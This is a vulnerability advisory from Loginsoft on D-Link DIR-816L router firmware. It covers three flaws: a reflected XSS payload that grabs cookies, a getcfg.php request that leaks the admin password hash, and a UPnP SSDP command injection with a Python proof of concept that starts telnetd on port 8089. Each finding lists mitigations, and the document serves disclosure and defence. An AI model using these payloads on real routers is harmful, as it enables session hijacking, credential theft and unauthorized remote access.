Multiple Vulnerabilities discovered in the D-link Firmware DIR-816L

Multiple Vulnerabilities discovered in the D-link Firmware DIR-816L

Loginsoft-2020-1008
31 March, 2020

CVE Number
CWE Number

CWE-79: Improper Neutralization of Input During Web Page Generation

Product Details

The DIR-816L Wireless AC750 Dual-Band Cloud Router is an affordable yet powerful wireless networking solution which combines the latest high-speed 802.11ac Wi-Fi technology with dual-band technology and fast Ethernet ports to deliver a seamless networking experience. The increased range and reliability of wireless AC technology reaches farther into your home, and advanced security features keep your network and data safe from intruders.
URL: http://www.dlink.lt/en/products/5/1962.html

Vulnerable Firmware Versions

2.06 & 2.06.B09_BETA (Latest)

Hardware

B1

Vulnerability Details

A Reflected Cross-site scripting vulnerability exists in DIR-816L, due to an unescaped `RESULT` value being printed on the webpage.

SYNOPSIS

In file webinc/js/info.php, there exists no output filtration being applied to the `RESULT` parameter, before it’s printed on the webpage.

Analysis

Payload – “,msgArray);alert(document.cookie);//

POC – http://192.168.0.1/info.php?RESULT=”,msgArray);alert(document.cookie);//

Exploitation:

An attacker can be remote or local, connected to the network & needs to entice the victim to visit a crafted link, which in turn will send the victims current cookie to the attacker’s server.
But in order to fully exploit the vulnerability. The attacker needs to be in the local network, in order to inject the stolen cookie into the browser, order to hijack the victim’s session.

Mitigations
  • Proper output escaping should be done, in order to eliminate any extra characters.
CWE Number

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Vulnerable Firmware Versions

2.06 & 2.06.B09_BETA (Latest)

Hardware

B1

Vulnerability Details

There exists an exposed administration function, allowing an attacker to gain unauthorized access to the few sensitive information.

SYNOPSIS

There exists an exposed administration function in getcfg.php, which can be used to call various services. The same be utilized by an attacker to retrieve various sensitive information, such as admin login credentials, by setting the value of `_POST_SERVICES` in the query string parameter to `DEVICE.ACCOUNT`.

Analysis

Payload – _POST_SERVICES=DEVICE.ACCOUNTAUTHORIZED_GROUP=1

Request:
URL – http://192.168.0.1/getcfg.php?a=%0a_POST_SERVICES%3DDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3D1

Response:

DEVICE.ACCOUNT

DIR-816L

Admin

//password hash disclosed
0


Exploitation:

An attacker can be anyone connected to the network & able to access the router login page. The above-mentioned request needs to browsed by an attacker in order to gain admin credentials (Password in hash).

Mitigations
  • Proper session check needs to be done before any administrative level function is accessed.
CWE Number

CWE-78: Improper Neutralization of Special Elements used in an OS Command

Vulnerable Firmware Versions

2.06 & 2.06.B09_BETA (Latest)

Hardware

B1

Vulnerability Details

A command injection vulnerability exists in DIR-816L, allowing an attacker to inject arbitrary command to the UPnP via a crafted M-SEARCH packet.

SYNOPSIS

Universal Plug and Play (UPnP), by default is enabled in DIR-816L, on the port 1900. An attacker can perform command injection by injecting the payload into the `Search Target` (ST) field of the SSDP M-SEARCH discover packet.

Analysis

Payload – ;telnetd -p 8089;ls

Proof Of Concept –
import socket
import struct
buf = ‘M-SEARCH * HTTP/1.1\r\nHOST:192.168.0.1:1900\r\nST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 8089;ls\r\nMX:2\r\nMAN:”ssdp:discover”\r\n\r\n’
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((“192.168.0.1”, 1900))
s.send(buf)
s.close()

Exploitation:

An attacker can be anyone connected to the network & able to send a request to the UPnP port. A crafted packet can be sent to the particular upnp port by writing a simple python script, which in turn executes the supplied command as part of the crafted request. The shared POC would turn on telnet service on port 8089, giving a gateway for an attacker to enter.

Mitigations
  • Blacklisting approach needs to be employed to filter out command injection-related payloads, such as `;` `||` etc.

Vendor Disclosure:

Credit

Discovered by ACE Team – Loginsoft